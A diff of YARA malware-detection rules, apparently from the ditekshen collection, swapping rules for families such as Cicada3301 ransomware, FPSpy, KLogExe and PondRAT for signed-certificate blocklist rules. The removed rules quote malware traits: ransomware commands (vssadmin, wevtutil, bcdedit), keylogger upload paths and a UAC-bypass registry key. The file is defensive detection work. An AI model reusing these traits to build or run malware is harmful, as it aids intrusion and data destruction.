-		author = "ditekshen"
-		id = "f63ebd05-fb4b-50fb-887b-dacd379594a4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "750b5b0d-7752-5407-a29e-3272b764a276"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11758-L11791"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5335-L5346"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ced9b558c7e17acd015cd2c9dd0c5d024bf9c31c7f2e7c9b7b937124109cf8b"
+		logic_hash = "5e64b59f3d7f7554a482eaa32f5eac80f289bf57865a21381a3c1c78b1dabcab"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/cmd/acc/agent_acc" ascii
-		$s2 = "main.DLLWMain" ascii
-		$s3 = "main.checkSilent" ascii
-		$h1 = ".handleInteractiveShell" ascii
-		$h2 = ".handleNetstat" ascii
-		$h3 = ".handleProcess" ascii
-		$h4 = ".handleRefreshHostInfo" ascii
-		$h5 = ".handleTimestomp" ascii
-		$h6 = ".handleSoInject" ascii
-		$h7 = ".HandleRegInfo" ascii
-		$h8 = ".handlePortscan" ascii
-		$h9 = ".handleReflectDllInject" ascii
-		$h10 = ".handleFileDownload" ascii
-		$f1 = ".RdpWithNTLM." ascii
-		$f2 = ".FingerPrintOs." ascii
-		$f3 = ".ScanWMI." ascii
-		$f4 = ".ScanWinRM." ascii
-		$f5 = ".ScanWeb." ascii
-		$f6 = ".ScanSmb2." ascii
-		$f7 = ".ScanRDP." ascii
-		$f8 = ".ScanPing." ascii
-		$f9 = ".ScanOxid." ascii
-		$f10 = ".ScanMssql." ascii
-		$f11 = ".ScanBanner." ascii
-		$fr1 = /\.proxy[CS]2[CS](TC|UD)P/ ascii
-		$fr2 = /\.Scan(WMI|WinRM|Web|Smb2|RDP|Ping|Oxid|Mssql|Banner)\./ ascii
+		thumbprint = "00c49b8d6fd7d2aa26faad8e5a31f93a15d66d09"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( ( 6 of ( $h* ) ) or ( 12 of ( $f* ) ) or ( 2 of ( $h* ) and 4 of ( $f* ) ) or ( 1 of ( $s* ) and ( 4 of ( $h* ) or 4 of ( $f* ) ) ) or ( 13 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LICHFIELD STUDIO GLASS LIMITED" and pe.signatures [ i ] . serial == "04:78:01:d5:b5:5c:80:0b:48:41:1f:d8:c3:20:ca:5b" )
 }
-rule DITEKSHEN_MALWARE_Win_Fakecaptcha_Downloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Ceb6B2Eec12934A64F75A4592159F084 : FILE
 {
 	meta:
-		description = "Detects downloader executables dropped by fake captcha"
-		author = "ditekshen"
-		id = "d577e8ef-11df-565c-9925-63b8768a7115"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "a37bf0a2-3205-515c-9957-374108e199e9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11793-L11803"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5366-L5377"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "57c39ce93f74d03767e7fde53281983a8462e4f3705d1bb9084bc169a08a0f83"
+		logic_hash = "3e4aa8d970ead42bf1abb36a922ef31ac1b1aa308944cf099d6bbfb50e07c588"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "</script>MZ" ascii
-		$s2 = "window.close();" ascii
-		$s3 = "eval(" ascii
+		thumbprint = "ccd30b68e37fc177b754250767a16062a711310a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WMade by H5et.com" and pe.signatures [ i ] . serial == "ce:b6:b2:ee:c1:29:34:a6:4f:75:a4:59:21:59:f0:84" )
 }
-rule DITEKSHEN_MALWARE_Win_Xenorat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6B6739E55F3F25B147C4A6767De41F57 : FILE
 {
 	meta:
-		description = "Detects Blacksuit"
-		author = "ditekshen"
-		id = "7f27ebef-8a0e-591a-a926-ac950db86053"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "ee84787b-cc90-545d-8e15-bf84676f222c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11805-L11820"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5379-L5391"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "487046464f545fb9e4a1d6e277cdc010eac6886583f0b388555a483d9021191b"
+		hash = "da0921c1e416b3734272dfa619f88c8cd32e9816cdcbeeb81d9e2b2e8a95af4c"
+		logic_hash = "9d1a20f3dfa6c31ed557e531f7a57c64032e518c033993234849882ef769fcbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "xeno rat client" wide
-		$x2 = "xeno_rat_client." ascii
-		$x3 = "xeno rat client" ascii
-		$s1 = "+<AddToStartupNonAdmin>" ascii
-		$s2 = "+<ConnectAndSetupAsync>" ascii
-		$s3 = "+<SendUpdateInfo>" ascii
-		$s4 = "+<RecvAllAsync_ddos_" ascii
-		$s5 = "Plugin.Chromium+<Get" ascii
+		thumbprint = "07a09d3d3c05918519d6f357fe7eed5e1d529f22"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) or ( 2 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avast Antivirus SEC" and pe.signatures [ i ] . serial == "6b:67:39:e5:5f:3f:25:b1:47:c4:a6:76:7d:e4:1f:57" )
 }
-rule DITEKSHEN_MALWARE_Multi_POOLRAT : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B97F66Bb221772Dc07Ef1D4Bed8F6085 : FILE
 {
 	meta:
-		description = "Detects POOLRAT"
-		author = "ditekshen"
-		id = "5831b479-592d-591b-88b4-73102fe4b6ec"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "c0797751-d03c-59c7-a02a-27e6f466bd96"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11822-L11839"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5393-L5404"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "efc5881975e97583188d43a8a6b0eb59bb7103664897cc0f88ddc4d2376bd842"
+		logic_hash = "e68f6ebbeadc9381c2888abf77e040f27648a40d770524830f8a49fe2d11534f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Osx.Trojan.POOLRAT"
-		clamav2 = "MALWARE.Linux.Trojan.POOLRAT"
-
-	strings:
-		$s1 = "MSG_CmdP" ascii
-		$s2 = "MSG_WriteConfigP" ascii
-		$s3 = "MSG_SecureDelP" ascii
-		$s4 = "ConnectToProxyP" ascii
-		$s5 = "MSG_KeepConP" ascii
-		$s6 = "MSG_SleepP" ascii
-		$s7 = "MSG_TestP" ascii
-		$s8 = "MSG_SetPathP" ascii
+		thumbprint = "fb4efb3bfcef8e9a667c8657f2e3c8fb7436666e"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf or uint16( 0 ) == 0xfeca ) and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S-PRO d.o.o." and pe.signatures [ i ] . serial == "00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" )
 }
-rule DITEKSHEN_MALWARE_Multi_Pondrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Cc95D6Ebf18A3711E196Aea210465A19 : FILE
 {
 	meta:
-		description = "Detects PondRAT"
-		author = "ditekshen"
-		id = "cb8cca87-6b5e-5984-8a73-9f800b262d77"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "bd6957ac-d5e0-5e77-87b3-a62c442f7f72"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11841-L11858"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5406-L5417"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "affa35f789725d3a8cea8dc95744c4e771690fde5f73936d0806a8c9f72fdb2e"
+		logic_hash = "640ba6d64ad7e0791ef29d3ee9387e0944826f22f01a6a01486f6b3ac4138826"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Osx.Trojan.PondRAT"
-		clamav2 = "MALWARE.Linux.Trojan.PondRAT"
-
-	strings:
-		$s1 = "MsgDown" ascii
-		$s2 = "MsgUp" ascii
-		$s3 = "MsgRun" ascii
-		$s4 = "MsgCmd" ascii
-		$s5 = "CryptPayload" ascii
-		$s6 = "RecvPayload" ascii
-		$s7 = "csleepi" ascii
-		$s8 = "FConnectProxy" ascii
+		thumbprint = "319f0e03f0f230629258c7ea05e7d56ead830ce9"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf or uint16( 0 ) == 0xfeca ) and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GEN Sistemi, d.o.o." and pe.signatures [ i ] . serial == "00:cc:95:d6:eb:f1:8a:37:11:e1:96:ae:a2:10:46:5a:19" )
 }
-rule DITEKSHEN_MALWARE_Win_Cicada3301 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Dde89C647Dc2138244228040E324Dc77 : FILE
 {
 	meta:
-		description = "Detects Cicada3301"
-		author = "ditekshen"
-		id = "0aebee9f-177d-5a1b-87e0-8797fb6f6823"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "5008d334-964a-516b-895e-761ae94e5bd4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11860-L11885"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5419-L5430"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b8b7596bc8ae01b89742e17bd3dbfcc1e2fad486cc6ea19c8de813fc677509f4"
+		logic_hash = "d6c11a277f855ad8a4b235e1461ad024c4490d04530b91ecb47c8fcf8dee1239"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Ransomware.Cicada3301"
-
-	strings:
-		$s1 = "cmd/Cchcp 65001 >nulnet view \\\\"
-		$s2 = "create_file_recovery"
-		$s3 = "ecnrypted_files_full"
-		$s4 = "get_excluded_directories"
-		$s5 = "collect_files_except"
-		$s6 = ".exe4d5a" ascii
-		$s7 = "-accepteula -s -d \"\" --" ascii
-		$s8 = "[*.exe*.EXE*.DLL*.ini*.inf*.pol*.cmd*.ps1*.vbs*.bat*.pagefile.sys*.hiberfil.sys*.drv" ascii
-		$s9 = "memtasveeamsvc$backupsqlvssmsexchangesql$mysqlmysql$sophosMSExchange" ascii
-		$s10 = "-DATA.txt" ascii
-		$s11 = /--no_(local|net|impl)/ fullword ascii
-		$c1 = "fsutil" ascii
-		$c2 = "iisreset" ascii
-		$c3 = "vssadmin" ascii
-		$c4 = "wmic" ascii
-		$c5 = "bcdedit" ascii
-		$c6 = "wevtutil" ascii
+		thumbprint = "1d9aaa1bc7d6fc5a76295dd1cf692fe4a1283f04"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 4 of ( $c* ) and 4 of ( $s* ) ) or ( all of ( $c* ) and 2 of ( $s* ) ) or 9 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WMade by H5et.com" and pe.signatures [ i ] . serial == "dd:e8:9c:64:7d:c2:13:82:44:22:80:40:e3:24:dc:77" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Fpspy : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : FILE
 {
 	meta:
-		description = "FPSpy"
-		author = "ditekshen"
-		id = "39d3be12-1b06-57b1-b3c2-2cbd13a17b03"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "8f7d0337-7840-5c6e-b562-dbaef1a7c022"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11887-L11916"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5432-L5443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c26736c7f056f3d13c58e724fda601e88468e2386852b072a37c6646fb5ef8f9"
+		logic_hash = "26690cb1ef7eb9b7009376b4c2a30505f01184f4462478f65379372e84e02bc8"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.FPSpy"
-
-	strings:
-		$f1 = "[Analys_Spy]" wide
-		$f2 = "[DeletePoorDll]" wide
-		$f3 = "[DownloadProc]" wide
-		$f4 = "[DragWarp]" wide
-		$f5 = "[GetCoolDir]" wide
-		$f6 = "[JackSleep]" wide
-		$f7 = "[KillCmdExe]" wide
-		$f8 = "[PsDownProc]" wide
-		$f9 = "[PsUpProc]" wide
-		$f10 = "[ReadFileFromPacket]" wide
-		$f11 = "[RemoteDropExec]" wide
-		$f12 = "[RemoteExec]" wide
-		$f13 = "[RemoteInject]" wide
-		$f14 = "[SendHttpForUpload]" wide
-		$s1 = "MazeFunc" fullword ascii
-		$s2 = /(Exit|Update|Drop)_EVT/ fullword ascii
-		$s3 = "Key.dat" fullword ascii
-		$s4 = "%sSysInfo_%02d_%02d_%02d.txt" fullword ascii
-		$s5 = "cmd /c systeminfo >> %s" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii
-		$s7 = "FPSpy" fullword wide
+		thumbprint = "4bc67aca336287ff574978ef3bf67c688f6449f2"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( pe.exports ( "MazeFunc" ) and 2 of ( $f* ) and 1 of ( $s* ) ) or ( 6 of ( $f* ) and 1 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $f* ) ) or ( 8 of ( $f* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LoL d.o.o." and pe.signatures [ i ] . serial == "00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" )
 }
-rule DITEKSHEN_MALWARE_Win_Klogexe : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4E7545C9Fc5938F5198Ab9F1749Ca31C : FILE
 {
 	meta:
-		description = "Detects KLogExe"
-		author = "ditekshen"
-		id = "8c3ebc2c-717b-5c42-9233-274006d4331b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "af27fbf7-f4e2-59e9-8b2b-b353704ce9d6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11918-L11937"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5445-L5456"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1f1809b83dc468122022b68d63734ba1597c6fede01582c31d1700ca0b9e1e22"
+		logic_hash = "4b7bc07622ad3f7ec77f4bb0d51350c82734af4b73a26ecd21955e55e99bb515"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.KLogExe"
-
-	strings:
-		$s1 = "[clip_s]: %s" ascii
-		$s2 = "------ %d/%d/%d : %d/%d ------" ascii
-		$s3 = "[RWin+]" ascii
-		$s4 = "[Too many clip_tail]" ascii
-		$s5 = "name=\"userfile\"; filename=\"%s\"" ascii
-		$s6 = "Origin: http://" wide
-		$s7 = "%s_%d_%d_%d_%d" wide
-		$s8 = "/wp-content/include.php?_sys_" wide
-		$s9 = "\\desktops.ini" wide
-		$s10 = "KLogExe" wide nocase
-		$s11 = "dynamic_import.cpp [resolve_call] can`nt" wide
+		thumbprint = "7a49677c535a13d0a9b6deb539d084ff431a5b54"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "For M d.o.o." and pe.signatures [ i ] . serial == "4e:75:45:c9:fc:59:38:f5:19:8a:b9:f1:74:9c:a3:1c" )
 }
-rule DITEKSHEN_MALWARE_Win_Babylockerkz : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_040F11F124A73Bdecc41259845A8A773 : FILE
 {
 	meta:
-		description = "Detects BabyLockerKZ"
-		author = "ditekshen"
-		id = "faa35818-2bed-528f-a6f0-5356a723ef5b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "0502773a-356e-5eae-9c37-e1ef89de3547"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11939-L11957"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5458-L5469"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "423bbd3b23591608a32e4e724c156fbaa5d1d087515137a82a0aeb8c4865d1ca"
+		logic_hash = "70edbe8be481ccb7b5c6a6485c2ac249ec5120a4cde18d551954cfeaae121f27"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = ":\\locker\\bin\\stub_win_x64_encrypter.pdb" ascii
-		$s2 = "taskkill /f /im explorer.exe" fullword wide
-		$s3 = "\\SysWOW64\\cmd.exe /c %windir%\\" wide
-		$s4 = "[!] Failed to RunNonElevated: %s, error 0x%X" fullword wide
-		$s5 = "[!] Failed to run sync command: %s, error 0x%X" fullword wide
-		$s6 = "[-] RunNonElevated: %s" fullword wide
-		$s7 = "[!][Encrypt] Not" fullword
-		$s8 = "[-] sALLUSERSPROFILE: %s" fullword wide
-		$s9 = "[!] WNetGetConnection failed 0x%X" fullword wide
-		$s10 = "[!][Scan] " wide
-		$s11 = "[-] Start encrypt" wide
+		thumbprint = "6f332f7e78cac4a6c35209fde248ef317f7a23e8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TrustPort" and pe.signatures [ i ] . serial == "04:0f:11:f1:24:a7:3b:de:cc:41:25:98:45:a8:a7:73" )
 }
 
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Reflectiveloader : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1B1E87E90519D7273C0033Bf489B798F : FILE
 {
 	meta:
-		description = "Detects Reflective DLL injection artifacts"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b7bd9184-48f8-5ad8-a234-632e4ec9814d"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "b154ae08-108c-5980-a611-5e086877af2a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L29-L43"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5471-L5483"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "540a48f98652c84b09f1076c2e2fca680781f533c936d602809179469a850ba0"
-		score = 40
-		quality = 45
+		hash = "84cef0aed269e6213bfa213d95a3db625bcdde130f33bf4227436985e4473252"
+		logic_hash = "b47f80ecc895e73d69c60a5e88d6a6c95fcb9bddb30f14a1421b68aabc2290c9"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "ef09824554f85603c9ffb1cecbfe06ae489a9583"
 		importance = 20
 
-	strings:
-		$s1 = "_ReflectiveLoader@" ascii wide
-		$s2 = "ReflectiveLoader@" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of them or ( pe.exports ( "ReflectiveLoader@4" ) or pe.exports ( "_ReflectiveLoader@4" ) or pe.exports ( "ReflectiveLoader" ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IBIS, OOO" and pe.signatures [ i ] . serial == "1b:1e:87:e9:05:19:d7:27:3c:00:33:bf:48:9b:79:8f" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_IMG_Embedded_Archive : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D9E834182Dec62C654E775E809Ac1D1B : FILE
 {
 	meta:
-		description = "Detects images embedding archives. Observed in TheRat RAT."
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2c8e15dc-2e84-5f9b-b538-cba204a3d38c"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "ce1640b7-6631-5e8f-a2df-0716b2f86b99"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L45-L66"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5485-L5497"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e61bc2489a54047c66a659ae2cb6df66683845676e1c02c34d9a0987ddec4bb"
-		score = 40
-		quality = 37
+		hash = "645dbb6df97018fafb4285dc18ea374c721c86349cb75494c7d63d6a6afc27e6"
+		logic_hash = "3e7ca9aec19f118c7a143826838244f3f8d0a603a44980522f5227a9c3a82a88"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "5bb983693823dbefa292c86d93b92a49ec6f9b26"
 		importance = 20
 
-	strings:
-		$sevenzip1 = { 37 7a bc af 27 1c 00 04 }
-		$sevenzip2 = { 37 e4 53 96 c9 db d6 07 }
-		$zipwopass = { 50 4b 03 04 14 00 00 00 }
-		$zipwipass = { 50 4b 03 04 33 00 01 00 }
-		$zippkfile = { 50 4b 03 04 0a 00 02 00 }
-		$rarheade1 = { 52 61 72 21 1a 07 01 00 }
-		$rarheade2 = { 52 65 74 75 72 6e 2d 50 }
-		$rarheade3 = { 52 61 72 21 1a 07 00 cf }
-		$mscabinet = { 4d 53 46 54 02 00 01 00 }
-		$zlockproe = { 50 4b 03 04 14 00 01 00 }
-		$winzip = { 57 69 6E 5A 69 70 }
-		$pklite = { 50 4B 4C 49 54 45 }
-		$pksfx = { 50 4B 53 70 58 }
-
 	condition:
-		( uint32( 0 ) == 0xe0ffd8ff or uint32( 0 ) == 0x474e5089 or uint16( 0 ) == 0x4d42 ) and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FoodLehto Oy" and pe.signatures [ i ] . serial == "00:d9:e8:34:18:2d:ec:62:c6:54:e7:75:e8:09:ac:1d:1b" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Eventviewer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ced87Bd70B092Cb93B182Fac32655F6 : FILE
 {
 	meta:
-		description = "detects Windows exceutables potentially bypassing UAC using eventvwr.exe"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e4e82d5a-a524-5fac-b14c-4e53a95f4f2c"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "5e716e70-0c78-5194-9134-0ee140221610"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L68-L77"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5499-L5511"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4b893db727ea3ef07805058e9a93664dc01590f249158d9b825cc9cece935640"
-		score = 40
-		quality = 41
+		hash = "083d5efb4da09432a206cb7fba5cef2c82dd6cc080015fe69c2b36e71bca6c89"
+		logic_hash = "3d4d84a60095e608fbd774f2b3a0f86e32dd9fe25801da06ee10188425a029e0"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "97b7602ed71480756cf6e4658a107f8278a48096"
 		importance = 20
 
-	strings:
-		$s1 = "\\Classes\\mscfile\\shell\\open\\command" ascii wide nocase
-		$s2 = "eventvwr.exe" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Creator Soft Limited" and pe.signatures [ i ] . serial == "0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Cleanmgr : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Afd1491D52F89Ba41Fa6C0281Bb9716 : FILE
 {
 	meta:
-		description = "detects Windows exceutables potentially bypassing UAC using cleanmgr.exe"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cebbe22d-d54d-5a1e-978a-37ddd96133b7"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "a0e5569f-7895-519b-9c1b-9cea3126391f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
